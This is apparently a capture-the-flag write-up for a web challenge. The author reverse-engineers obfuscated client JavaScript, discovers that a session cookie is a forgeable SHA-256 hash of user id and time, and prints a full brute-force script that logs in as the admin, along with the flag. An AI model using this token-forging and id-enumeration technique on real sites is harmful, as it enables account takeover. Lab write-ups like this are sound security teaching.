Tags: web 

Rating:

In this challenge you had to be able to log in to the admin's account.

When you open the site's HTML source you see 4 scripts:
- jquery
- a SHA (SHA-256 presumably) hasher
- some kind of cookie manager
- the interactive JavaScript that governs the page, conveniently named challange.js

The first thing I did was look through the HTML page to see what was on it.
I discovered a registration div hidden with CSS.
I searched for this form in challange.js and found the method used to register an account.
It was not protected by a forced login, information verification or anything of the sort.
You only send the same password twice and it registers you.
I went ahead and did so and got an account with a number as username.
I looked further into challange.js and found these lines of code:

```javascript
// excerpted from the obfuscated challange.js; the else-if belongs to a larger login check
var _0x496673 = Cookies['get']('id');
else if (_0x496673 != $('#login-username')['val']()) _0x1e5323['failure']();
```

This meant that the `id` cookie is your username.

Since it saved information in the cookies, I searched the file for more cookies and found 3 being stored:
- id
- time
- cck

Now I wanted to look at how you logged in.
There were 4 POST methods:
- 1 was for registering
- 2 were for login
- the last one was unclear

One logged in using username and password.
One logged in using the cck cookie and the id cookie.
The unclear one only sent the id, and when it was successful it used the retrieved information to compare against the time cookie:

`if (_0x3f2e31['time'] != _0x1cedcf) _0x1e5323['failure']();`

`_0x3f2e31` was the retrieved response.

So now I knew that if I sent the same POST request with a valid id, I would get the time related to that id.
I tested it on the account I created and it worked.

All the other methods were useless at this point, so I continued my search in functions I could exploit.
All the way at the top was a hash function which is referenced only in the creation of the cck cookie.
So the cck cookie is a hash, but made from what?
At first glance it was made from something you get back after logging in with an account, and it at least contained the id and time, because of this piece of code referenced in the login function:

```javascript
// called with the login response; stores id and time, and derives cck from the same object
function _0x3424b0(_0x578481) {
  Cookies['set']('id', _0x578481['id']);
  Cookies['set']('time', _0x578481['time']);
  Cookies['set']('cck', _0x3b8338(_0x578481)); // _0x3b8338 is the hash function at the top of the file
}
```

I logged in and the response also had a data object inside it.
But on a second look, the hash function only uses the time and id to create the cck.
And we already have an id and a time, so we have access to the cck now too.

Now one of the login methods becomes useful, because you can log in using the cck and id.
So to summarize:

We need an id to get the time, and we need the time and id to get the cck.
So we only need the id of the account to log in.
The only question now is: "What is the id of the admin?"
Nowhere in the task was any number referenced, and the id has to be a number, judging from the account I created myself.

So the only way to continue was to brute-force it.
I wrote some code that would automatically try to log in using a given id, and ended up with this:

```javascript
var id = "0"; // the id to try; this value is incremented between runs
$['ajax']({
  'url': 'api/login/',
  'type': 'POST',
  'headers': {
    'X-Cache-Command': 'META', // the "unclear" request: returns the time for this id
    'X-Cache-User': id
  },
  'success': _0x3f2e31 => {
    // rebuild the cck cookie the same way the page's hash function does
    var _0x51fe42 = new jsSHA('SHA-256', 'TEXT');
    var _0x4e3a61 = id + '\x20000\x20114328\x20000\x20' + _0x3f2e31.time;
    _0x51fe42['update'](_0x4e3a61);
    var _0x50f900 = _0x51fe42['getHash']('HEX');

    // second request: the login method that takes the id and cck
    $['ajax']({
      'url': 'api/login/',
      'type': 'POST',
      'headers': {
        'X-Cache-Command': 'PULL',
        'X-Cache-User': id,
        'X-Cache-Key': _0x50f900
      },
      'success': _0xa48257 => {
        console.log(_0xa48257);
      },
      'error': () => {
        alert('Unexpected\x20Error!');
        Cookies['remove']('id');
        Cookies['remove']('cck');
        Cookies['remove']('time');
      }
    });
  }
});
```

At the end of this script the account's information is returned,
and with `id='6'` the information returned contained the flag:
CodefestCTF{1AmTeHHHAX00Rr4uj8rfi4e$%y5yhrf}